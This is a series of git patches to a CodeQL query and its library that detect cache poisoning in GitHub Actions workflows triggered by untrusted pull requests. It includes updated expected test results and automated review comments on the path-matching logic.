.github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:37:9:37:75 | Run 
Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| 
.github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | From 2273aadb4bc0b80bc48eec448de0b6405a5e32ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:47:00 +0200 Subject: [PATCH 0453/1267] Improve Cache Poisoning query The untrusted files path is compared with the path written to the cache to check if the cache can really be poisoned --- ql/src/Security/CWE-349/CachePoisoning.ql | 52 ++++++++++++++++++++--- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 6609dae2b7f..3f2bb8db472 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -18,19 +18,47 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[cache_path, untrusted_path] +predicate controlledCachePath(string cache_path, string untrusted_path) { + exists(string normalized_cache_path, string normalized_untrusted_path | + ( + cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") + or + normalized_cache_path = cache_path.regexpReplaceAll("/$", "") + ) and + ( + untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") + or + normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") + ) and + normalized_cache_path.substring(0, normalized_untrusted_path.length()) = + normalized_untrusted_path + ) +} + query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step artifact, Step s +from LocalJob j, Event e, Step source, Step s, string message, string path where ( - artifact instanceof PRHeadCheckoutStep or - artifact instanceof UntrustedArtifactDownloadStep + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." 
and + path = source.(UntrustedArtifactDownloadStep).getPath() ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -43,19 +71,29 @@ where ) ) and // the job checkouts untrusted code from a pull request - j.getAStep() = artifact and + j.getAStep() = source and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep and + ( + // we dont know what code can be controlled by the attacker + path = "?" + or + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from the path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - artifact.getAFollowingStep() = s and + source.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, artifact, s, "Potential cache poisoning in the context of the default branch" +select s, source, s, "Potential cache poisoning in the context of the default branch" + message From 14f1672e740dae8beb881e5b895c73f443e5437c Mon Sep 17 00:00:00 2001 
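Review bot: The final comparison in `controlledCachePath` is a plain string-prefix test, so an unrelated sibling such as `./results-old` is treated as lying under an untrusted `./results`; anchoring both sides on a separator, `(normalized_cache_path + "/").indexOf(normalized_untrusted_path + "/") = 0`, avoids that. The test also runs in one direction only: a cache `path` that is a parent of the untrusted directory (for example `.`) still captures the untrusted files but is not matched, which looks like a detection gap worth covering or documenting in the QLDoc. The second disjunct of each normalisation is not guarded by a negated `regexpMatch`, so relative paths get both the prefixed and the unprefixed form; this is harmless here, but a guard would make the intent explicit. Neither `test22.yml` nor `test23.yml` exercises these boundary cases.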
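Review bot: `path` is bound in the first conjunct of the `where` clause, so it also constrains the second disjunct of this hunk (`source.getAFollowingStep() = s and s instanceof PoisonableStep`), which never uses it. If any `PRHeadCheckoutStep` or `UntrustedArtifactDownloadStep` subclass has no `getPath()` result, the alert for executed untrusted code disappears together with the cache-write one; those definitions are outside this diff section, so this needs verifying. Scoping the variable to the cache-writing branch with an `exists(string path | ... )` keeps the two detections independent. The `"?"` sentinel is compared in three places here and would be easier to maintain behind a small named predicate whose QLDoc states that it means the location is unknown and is assumed controllable.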
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:54:26 +0200 Subject: [PATCH 0454/1267] Fix query message --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 45 ++++++++++--------- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3f2bb8db472..3807cb4b592 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -96,4 +96,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, source, s, "Potential cache poisoning in the context of the default branch" + message +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2ad477a2a8b..fdaf0cf25ad 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -73,25 +73,26 @@ edges | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | From fbc2e1e7e807de23e871df121b71b4a41cfc3ec1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 10:47:12 +0200 Subject: [PATCH 0455/1267] Remove caching actions that cache files outside of the CWD --- .../actions/security/CachePoisoningQuery.qll | 81 +------------------ 1 file changed, 3 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 8c1a9ee0fd7..56002cb2b16 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -51,87 +51,13 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { - if exists(this.(UsesStep).getArgument("path")) - then result = this.(UsesStep).getArgument("path").splitAt("\n") - else result = "?" - } -} - -class SetupJavaUsesStep extends CacheWritingStep, UsesStep { - SetupJavaUsesStep() { - this.getCallee() = "actions/setup-java" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { - this.getCallee() = "actions/setup-go" and - ( - not exists(this.getArgument("cache")) - or - this.getArgument("cache") = "true" - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupNodeUsesStep extends CacheWritingStep, UsesStep { - SetupNodeUsesStep() { - this.getCallee() = "actions/setup-node" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" 
} -} - -class SetupPythonUsesStep extends CacheWritingStep, UsesStep { - SetupPythonUsesStep() { - this.getCallee() = "actions/setup-python" and - ( - exists(this.getArgument("cache")) or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } -} - -class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { - SetupDotnetUsesStep() { - this.getCallee() = "actions/setup-dotnet" and - ( - this.getArgument("cache") = "true" or - exists(this.getArgument("cache-dependency-path")) - ) - } - - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -140,6 +66,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - // TODO: Try to get the actual path being cached - override string getPath() { result = "?" } + override string getPath() { result = "vendor/bundle" } } From d18179850d6fc9557172372376dfc81aa993c939 Mon Sep 17 00:00:00 2001 
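Review bot: With the `else result = "?"` branch removed, `getPath()` on `CacheActionUsesStep` and `CacheActionSaveUsesStep` has no result when the step carries no `path` argument, so any conjunction that reads `getPath()` silently drops that step. That may be intended, but it changes the contract of `CacheWritingStep.getPath()` and deserves a QLDoc line on the override, e.g. `/** Gets one result per line of the path input; has no result when the input is absent. */`. Callers that still compare the result against `"?"` should be re-checked, since none of the classes left in this hunk produce that value any more. The two overrides are now identical and could be shared.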
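Review bot: The hard-coded `result = "vendor/bundle"` in `SetupRubyUsesStep.getPath()` only matches the cached directory when bundler runs from the workspace root. If the step sets the action's `working-directory` input, the directory presumably sits under that path, and the cache-path comparison in the queries could then miss it. State the assumption next to the override, e.g. `// assumes the default working directory; bundler-cache keeps gems in vendor/bundle next to the Gemfile`, or prefix the value with the `working-directory` argument when it is present. The class constructor begins outside this hunk.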
